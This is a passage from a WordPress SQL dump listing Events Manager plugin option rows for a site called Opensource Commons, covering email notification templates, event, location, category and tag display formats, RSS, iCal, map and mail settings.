(589,'dbem_search_form_towns','0','yes'),
(590,'dbem_search_form_towns_label','All Cities/Towns','yes'),
(591,'dbem_search_form_town_label','City/Town','yes'),
(592,'dbem_events_form_editor','1','yes'),
(593,'dbem_events_form_reshow','1','yes'),
(594,'dbem_events_form_result_success','You have successfully submitted your event.','yes'),
(595,'dbem_events_form_result_success_updated','You have successfully updated your event.','yes'),
(596,'dbem_events_anonymous_submissions','0','yes'),
(597,'dbem_events_anonymous_user','1','yes'),
(598,'dbem_events_anonymous_result_success','You have successfully submitted your event, which will be published pending approval.','yes'),
(599,'dbem_event_submitted_email_admin','','yes'),
(600,'dbem_event_submitted_email_subject','Submitted Event Awaiting Approval','yes'),
(601,'dbem_event_submitted_email_body','A new event has been submitted by #_CONTACTNAME.\r\n\r\nName : #_EVENTNAME \r\n\r\nDate : #_EVENTDATES \r\n\r\nTime : #_EVENTTIMES \r\n\r\nPlease visit http://opensource-commons.dev/wp-admin/post.php?action=edit&post=#_EVENTPOSTID to review this event for approval.\r\n\r\n\r\n-------------------------------\r\n\r\nPowered by Events Manager - http://wp-events-plugin.com','yes'),
(602,'dbem_event_resubmitted_email_subject','Re-Submitted Event Awaiting Approval','yes'),
(603,'dbem_event_resubmitted_email_body','A previously published event has been modified by #_CONTACTNAME, and this event is now unpublished and pending your approval.\r\n\r\nName : #_EVENTNAME \r\n\r\nDate : #_EVENTDATES \r\n\r\nTime : #_EVENTTIMES \r\n\r\nPlease visit http://opensource-commons.dev/wp-admin/post.php?action=edit&post=#_EVENTPOSTID to review this event for approval.\r\n\r\n\r\n-------------------------------\r\n\r\nPowered by Events Manager - http://wp-events-plugin.com','yes'),
(604,'dbem_event_published_email_subject','Published Event - #_EVENTNAME','yes'),
(605,'dbem_event_published_email_body','A new event has been published by #_CONTACTNAME.\r\n\r\nName : #_EVENTNAME \r\n\r\nDate : #_EVENTDATES \r\n\r\nTime : #_EVENTTIMES \r\n\r\nEdit this event - http://opensource-commons.dev/wp-admin/post.php?action=edit&post=#_EVENTPOSTID \r\n\r\n View this event - #_EVENTURL\r\n\r\n\r\n-------------------------------\r\n\r\nPowered by Events Manager - http://wp-events-plugin.com','yes'),
(606,'dbem_event_approved_email_subject','Event Approved - #_EVENTNAME','yes'),
(607,'dbem_event_approved_email_body','Dear #_CONTACTNAME, \r\n\r\nYour event #_EVENTNAME on #_EVENTDATES has been approved.\r\n\r\nYou can view your event here: #_EVENTURL\r\n\r\n\r\n-------------------------------\r\n\r\nPowered by Events Manager - http://wp-events-plugin.com','yes'),
(608,'dbem_event_reapproved_email_subject','Event Approved - #_EVENTNAME','yes'),
(609,'dbem_event_reapproved_email_body','Dear #_CONTACTNAME, \r\n\r\nYour event #_EVENTNAME on #_EVENTDATES has been approved.\r\n\r\nYou can view your event here: #_EVENTURL\r\n\r\n\r\n-------------------------------\r\n\r\nPowered by Events Manager - http://wp-events-plugin.com','yes'),
(610,'dbem_events_page_title','Events','yes'),
(611,'dbem_events_page_scope','future','yes'),
(612,'dbem_events_page_search_form','1','yes'),
(613,'dbem_event_list_item_format_header','<table cellpadding=\"0\" cellspacing=\"0\" class=\"events-table\" >\r\n <thead>\r\n <tr>\r\n <th class=\"event-time\" width=\"150\">Date/Time</th>\r\n <th class=\"event-description\" width=\"*\">Event</th>\r\n </tr>\r\n </thead>\r\n <tbody>','yes'),
(614,'dbem_event_list_item_format','<tr>\r\n <td>\r\n #_EVENTDATES<br/>\r\n #_EVENTTIMES\r\n </td>\r\n <td>\r\n #_EVENTLINK\r\n {has_location}<br/><i>#_LOCATIONNAME, #_LOCATIONTOWN #_LOCATIONSTATE</i>{/has_location}\r\n </td>\r\n </tr>','yes'),
(615,'dbem_event_list_item_format_footer','</tbody></table>','yes'),
(616,'dbem_event_list_groupby','0','yes'),
(617,'dbem_event_list_groupby_format','','yes'),
(618,'dbem_event_list_groupby_header_format','<h2>#s</h2>','yes'),
(619,'dbem_display_calendar_in_events_page','0','yes'),
(620,'dbem_single_event_format','<div style=\"float:right; margin:0px 0px 15px 15px;\">#_LOCATIONMAP</div>\r\n<p>\r\n <strong>Date/Time</strong><br/>\r\n Date(s) - #_EVENTDATES<br /><i>#_EVENTTIMES</i>\r\n</p>\r\n{has_location}\r\n<p>\r\n <strong>Location</strong><br/>\r\n #_LOCATIONLINK\r\n</p>\r\n{/has_location}\r\n<p>\r\n <strong>Categories</strong>\r\n #_CATEGORIES\r\n</p>\r\n<br style=\"clear:both\" />\r\n#_EVENTNOTES\r\n{has_bookings}\r\n<h3>Bookings</h3>\r\n#_BOOKINGFORM\r\n{/has_bookings}','yes'),
(621,'dbem_event_excerpt_format','#_EVENTDATES @ #_EVENTTIMES - #_EVENTEXCERPT','yes'),
(622,'dbem_event_excerpt_alt_format','#_EVENTDATES @ #_EVENTTIMES - #_EVENTEXCERPT{55}','yes'),
(623,'dbem_event_page_title_format','#_EVENTNAME','yes'),
(624,'dbem_event_all_day_message','All Day','yes'),
(625,'dbem_no_events_message','No Events','yes'),
(626,'dbem_locations_default_orderby','location_name','yes'),
(627,'dbem_locations_default_order','ASC','yes'),
(628,'dbem_locations_default_limit','10','yes'),
(629,'dbem_locations_page_title','Event Locations','yes'),
(630,'dbem_locations_page_search_form','1','yes'),
(631,'dbem_no_locations_message','No Locations','yes'),
(632,'dbem_location_default_country','0','yes'),
(633,'dbem_location_list_item_format_header','<ul class=\"em-locations-list\">','yes'),
(634,'dbem_location_list_item_format','<li>#_LOCATIONLINK<ul><li>#_LOCATIONFULLLINE</li></ul></li>','yes'),
(635,'dbem_location_list_item_format_footer','</ul>','yes'),
(636,'dbem_location_page_title_format','#_LOCATIONNAME','yes'),
(637,'dbem_single_location_format','<div style=\"float:right; margin:0px 0px 15px 15px;\">#_LOCATIONMAP</div>\r\n<p>\r\n <strong>Address</strong><br/>\r\n #_LOCATIONADDRESS<br/>\r\n #_LOCATIONTOWN<br/>\r\n #_LOCATIONSTATE<br/>\r\n #_LOCATIONREGION<br/>\r\n #_LOCATIONPOSTCODE<br/>\r\n #_LOCATIONCOUNTRY\r\n</p>\r\n<br style=\"clear:both\" />\r\n#_LOCATIONNOTES\r\n\r\n<h3>Upcoming Events</h3>\r\n<p>#_LOCATIONNEXTEVENTS</p>','yes'),
(638,'dbem_location_excerpt_format','#_LOCATIONEXCERPT','yes'),
(639,'dbem_location_excerpt_alt_format','#_LOCATIONEXCERPT{55}','yes'),
(640,'dbem_location_no_events_message','<li>No events in this location</li>','yes'),
(641,'dbem_location_event_list_item_header_format','<ul>','yes'),
(642,'dbem_location_event_list_item_format','<li>#_EVENTLINK - #_EVENTDATES - #_EVENTTIMES</li>','yes'),
(643,'dbem_location_event_list_item_footer_format','</ul>','yes'),
(644,'dbem_location_event_list_limit','20','yes'),
(645,'dbem_location_event_single_format','#_EVENTLINK - #_EVENTDATES - #_EVENTTIMES','yes'),
(646,'dbem_location_no_event_message','No events in this location','yes'),
(647,'dbem_categories_default_limit','10','yes'),
(648,'dbem_categories_default_orderby','name','yes'),
(649,'dbem_categories_default_order','ASC','yes'),
(650,'dbem_categories_list_item_format_header','<ul class=\"em-categories-list\">','yes'),
(651,'dbem_categories_list_item_format','<li>#_CATEGORYLINK</li>','yes'),
(652,'dbem_categories_list_item_format_footer','</ul>','yes'),
(653,'dbem_no_categories_message','No Categories','yes'),
(654,'dbem_category_page_title_format','#_CATEGORYNAME','yes'),
(655,'dbem_category_page_format','#_CATEGORYNOTES<h3>Upcoming Events</h3>#_CATEGORYNEXTEVENTS','yes'),
(656,'dbem_category_no_events_message','<li>No events in this category</li>','yes'),
(657,'dbem_category_event_list_item_header_format','<ul>','yes'),
(658,'dbem_category_event_list_item_format','<li>#_EVENTLINK - #_EVENTDATES - #_EVENTTIMES</li>','yes'),
(659,'dbem_category_event_list_item_footer_format','</ul>','yes'),
(660,'dbem_category_event_list_limit','20','yes'),
(661,'dbem_category_event_single_format','#_EVENTLINK - #_EVENTDATES - #_EVENTTIMES','yes'),
(662,'dbem_category_no_event_message','No events in this category','yes'),
(663,'dbem_category_default_color','#a8d144','yes'),
(664,'dbem_tags_default_limit','10','yes'),
(665,'dbem_tags_default_orderby','name','yes'),
(666,'dbem_tags_default_order','ASC','yes'),
(667,'dbem_tags_list_item_format_header','<ul class=\"em-tags-list\">','yes'),
(668,'dbem_tags_list_item_format','<li>#_TAGLINK</li>','yes'),
(669,'dbem_tags_list_item_format_footer','</ul>','yes'),
(670,'dbem_no_tags_message','No Tags','yes'),
(671,'dbem_tag_page_title_format','#_TAGNAME','yes'),
(672,'dbem_tag_page_format','<h3>Upcoming Events</h3>#_TAGNEXTEVENTS','yes'),
(673,'dbem_tag_no_events_message','<li>No events with this tag</li>','yes'),
(674,'dbem_tag_event_list_item_header_format','<ul>','yes'),
(675,'dbem_tag_event_list_item_format','<li>#_EVENTLINK - #_EVENTDATES - #_EVENTTIMES</li>','yes'),
(676,'dbem_tag_event_list_item_footer_format','</ul>','yes'),
(677,'dbem_tag_event_single_format','#_EVENTLINK - #_EVENTDATES - #_EVENTTIMES','yes'),
(678,'dbem_tag_no_event_message','No events with this tag','yes'),
(679,'dbem_tag_event_list_limit','20','yes'),
(680,'dbem_rss_limit','0','yes'),
(681,'dbem_rss_scope','future','yes'),
(682,'dbem_rss_main_title','Opensource Commons - Events','yes'),
(683,'dbem_rss_main_description','Just another WordPress site - Events','yes'),
(684,'dbem_rss_description_format','#_EVENTDATES - #_EVENTTIMES <br/>#_LOCATIONNAME <br/>#_LOCATIONADDRESS <br/>#_LOCATIONTOWN','yes'),
(685,'dbem_rss_title_format','#_EVENTNAME','yes'),
(686,'dbem_rss_order','ASC','yes'),
(687,'dbem_rss_orderby','event_start_date,event_start_time,event_name','yes'),
(688,'em_rss_pubdate','Fri, 13 Mar 2015 20:30:54 +0000','yes'),
(689,'dbem_ical_limit','0','yes'),
(690,'dbem_ical_scope','future','yes'),
(691,'dbem_ical_description_format','#_EVENTNAME - #_LOCATIONNAME - #_EVENTDATES - #_EVENTTIMES','yes'),
(692,'dbem_ical_real_description_format','#_EVENTEXCERPT','yes'),
(693,'dbem_ical_location_format','#_LOCATION','yes'),
(694,'dbem_gmap_is_active','1','yes'),
(695,'dbem_map_default_width','400px','yes'),
(696,'dbem_map_default_height','300px','yes'),
(697,'dbem_location_baloon_format','<strong>#_LOCATIONNAME</strong><br/>#_LOCATIONADDRESS - #_LOCATIONTOWN<br/><a href=\"#_LOCATIONPAGEURL\">Events</a>','yes'),
(698,'dbem_map_text_format','<strong>#_LOCATIONNAME</strong><p>#_LOCATIONADDRESS</p><p>#_LOCATIONTOWN</p>','yes'),
(699,'dbem_email_disable_registration','0','yes'),
(700,'dbem_rsvp_mail_port','465','yes'),
(701,'dbem_smtp_host','localhost','yes'),
(702,'dbem_mail_sender_name','','yes'),
(703,'dbem_rsvp_mail_send_method','wp_mail','yes'),
(704,'dbem_rsvp_mail_SMTPAuth','1','yes'),
(705,'dbem_smtp_html','1','yes'),
(706,'dbem_smtp_html_br','1','yes'),
(707,'dbem_image_max_width','700','yes'),
(708,'dbem_image_max_height','700','yes'),